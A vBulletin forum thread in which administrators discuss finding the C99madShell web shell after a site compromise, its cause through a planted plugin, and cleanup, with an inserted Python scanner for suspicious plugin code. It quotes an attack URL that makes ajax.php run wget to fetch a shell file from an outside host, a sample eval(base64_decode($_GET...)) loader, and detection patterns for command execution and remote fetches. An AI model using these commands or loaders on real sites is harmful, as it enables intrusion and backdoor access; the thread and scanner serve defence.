C99madShell v. 2.0 madnet edition


ryan.gottlieb
01-21-2009, 02:04 AM
I upgraded vBulletin 3.8 from 3.7, and now whenever I try to edit subscriptions, this comes up... it's a PHP shell script...

--------------- Added 1232510889 at 1232510889 ---------------

Ok... it was going back to the init.php file, and told me this line


($hook = vBulletinHook::fetch_hook('init_startup')) ? eval($hook) : false;


I commented that line out (//) and it went away....

--------------- Added 1232511838 at 1232511838 ---------------

solved.... error.php

Dismounted
01-21-2009, 03:04 AM
By commenting that line, you are only disabling that hook. It hasn't fixed the hole that allowed the attacker to run the shell in the first place.

ryan.gottlieb
01-27-2009, 01:33 AM
No, by SOLVED I meant I removed the script.. (The shell script)

Dismounted
01-27-2009, 02:58 AM
That still does not solve how the attacker got the file there. Unless you know that already too?

blowy
08-23-2011, 10:50 AM
I am having this problem as well... When I try to edit the payments manager I get the above msg

!C99madShell v. 2.0 madnet edition!

Software: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5. PHP/5.2.13

Marco64Th
08-24-2011, 03:56 AM
This is a trojan, just google for it. You should contact your host ASAP to find out how it got into your account and to remove all traces of it.

Crad
08-24-2011, 02:01 PM
Um, it's not a Trojan :P

http://www.derekfountain.org/security_c99madshell.php

You've encountered the first evidence that your site has been compromised! Cheers!

TheLastSuperman
08-24-2011, 03:06 PM
Um, it's not a Trojan :P

http://www.derekfountain.org/security_c99madshell.php

You've encountered the first evidence that your site has been compromised! Cheers!

Tomato, Tomato or Potato, Potato, it does not matter, it's malicious and is still something you do not want to see when navigating the admincp or any other part of your site for that matter, and tbh I have no clue why you even posted that last snippet of quick wit, nothing to cheer about until you've removed it :erm:.

daydie
08-24-2011, 06:27 PM
they get the file on your server by ajax.php - they use it like forum.com/ajax.php?global=wget http://www.examplewebsite.org/c100.txt

Then they process this from here.

I would recommend vbulletin upgrading / securing the ajax.php asap

Marco64Th
08-25-2011, 02:51 AM
Um, it's not a Trojan :P

http://www.derekfountain.org/security_c99madshell.php

You've encountered the first evidence that your site has been compromised! Cheers!

A useless discussion on semantics in my view, the poster that asked the question will understand that it is a serious security issue if I use the word "Trojan".

But how would you call an unwanted script that gives an unauthorized person backdoor access to system functions and data?

ishare
08-29-2011, 06:53 PM
Right now I have exactly the same problem. Does anyone know how to solve this problem please? I am running my own dedicated server but since I am not good with server management, I do not have any idea about what to do on the server side if it's not about removing a file or something like that...

vbresults
08-29-2011, 08:29 PM
I saw this for the first time on a client's install two or so months ago. None of the vBulletin files were modified and the database was clean so I was stumped at first. It turns out this particular exploit uses vB's plugin/hook system; if you see a strange plugin (note I said plugin, not product), remove it. Then, find out how it got on there. xD

Just read a document on this exploit; bad file permission or upload script setups could allow something like this to happen.

Fortezza
08-30-2011, 05:52 AM
I think Shell is malicious :)

Paul M
08-30-2011, 08:36 AM
they get the file on your server by ajax.php - they use it like forum.com/ajax.php?global=wget http://www.examplewebsite.org/c100.txt

Then they process this from here.

I would recommend vbulletin upgrading / securing the ajax.php asap

You cannot upload files like that with ajax.php unless someone has already compromised you.

What actually happens is they use SQL injection via an unsafe modification to install a plugin on the ajax hook, then use that malicious plugin to install the file.

If your forum directory was properly secured as read only (to apache) then that wget would fail to actually save the file.
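A defender-side check that follows from the advice in this thread (look for a strange plugin on an early hook, and for hook code that evaluates request input): the script below scans rows shaped like vBulletin's `plugin` table and reports the ones worth reviewing by hand. This is an added example, not code from the thread or from vBulletin; the column names are vBulletin's, but the hook name set and the two sample rows are constructed assumptions, and in practice the rows would come from a database dump or the Plugin Manager.

```python
import re

# Sample rows in the shape of vBulletin's `plugin` table (pluginid, title,
# hookname, phpcode, product, active). Both rows are constructed for this
# example; the second mimics the kind of hook-planted loader the thread describes.
SAMPLE_PLUGINS = [
    {"pluginid": 1, "title": "Mobile style switch", "hookname": "global_start",
     "phpcode": "if ($vbulletin->userinfo['userid']) { $show['mobile'] = true; }",
     "product": "vbulletin", "active": 1},
    {"pluginid": 2, "title": " ", "hookname": "init_startup",
     "phpcode": "if (isset($_GET['global'])) { eval(base64_decode($_GET['global'])); }",
     "product": "vbulletin", "active": 1},
]

# Each pattern is a reason to look at the plugin by hand, not proof of compromise.
SUSPICIOUS_PATTERNS = {
    "eval": re.compile(r"\beval\s*\(", re.I),
    "obfuscation": re.compile(r"\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    "command_exec": re.compile(r"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\(", re.I),
    "remote_fetch": re.compile(r"\b(wget|curl)\b|file_get_contents\s*\(\s*['\"]https?://", re.I),
    "file_write": re.compile(r"\b(file_put_contents|fwrite|move_uploaded_file)\s*\(", re.I),
    "request_input": re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b"),
}

# Hooks that run on every request (or on ajax.php) give a planted plugin the most
# reach; this set is assumed from vBulletin 3.x hook names, not taken from the thread.
EARLY_HOOKS = {"init_startup", "global_start", "global_complete", "ajax_start", "ajax_complete"}


def scan_plugin(row):
    """Return the list of reasons this plugin row deserves a manual review."""
    findings = [name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(row["phpcode"])]
    if not row["title"].strip():
        findings.append("blank_title")
    # Request input flowing into eval/exec is the strongest signal in this set.
    if "request_input" in findings and ({"eval", "command_exec"} & set(findings)):
        findings.append("input_to_execution")
    if findings and row["hookname"] in EARLY_HOOKS:
        findings.append("early_hook:" + row["hookname"])
    return findings


def scan_plugins(rows):
    """Map pluginid -> findings for every row that has at least one finding."""
    report = {}
    for row in rows:
        findings = scan_plugin(row)
        if findings:
            report[row["pluginid"]] = findings
    return report


if __name__ == "__main__":
    for pluginid, findings in scan_plugins(SAMPLE_PLUGINS).items():
        print(f"plugin {pluginid}: {', '.join(findings)}")
```

A flagged plugin is a lead, not a verdict: compare it against the product's shipped plugins and, as the thread says, still work out how it was installed.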

gazza2008
03-31-2012, 05:31 PM
How would I get rid of this? I've been compromised as well...

Is it in a folder in FTP, or is it code I can delete, etc.?

TheLastSuperman
03-31-2012, 06:33 PM
How would I get rid of this? I've been compromised as well...

Is it in a folder in FTP, or is it code I can delete, etc.?

Contact your host and/or hire someone to remove it, as this is quite nasty and who knows if you have the same edition (you can modify and add/remove code before uploading a script), and is yours in English or Arabic? I've seen this script in three different languages honestly, so long story short, if you're not experienced in this, it's not ideal for you to try and sort it yourself unfortunately :(.

Edit: You can try POST #4 (https://www.vbulletin.com/forum/showthread.php/393227-Preventative-How-to-avoid-being-Hacked-by-TeamPS-i-e-p0wersurge?p=2245651&viewfull=1#post2245651) shown in this thread - https://www.vbulletin.com/forum/showthread.php/393227-Preventative-How-to-avoid-being-Hacked-by-TeamPS-i-e-p0wersurge

Teascu Dorin
09-19-2013, 09:11 PM
Look into the PLUGIN MANAGER and check for any suspect plugins installed. I found 4 of them.

This is a period of nasty hacking.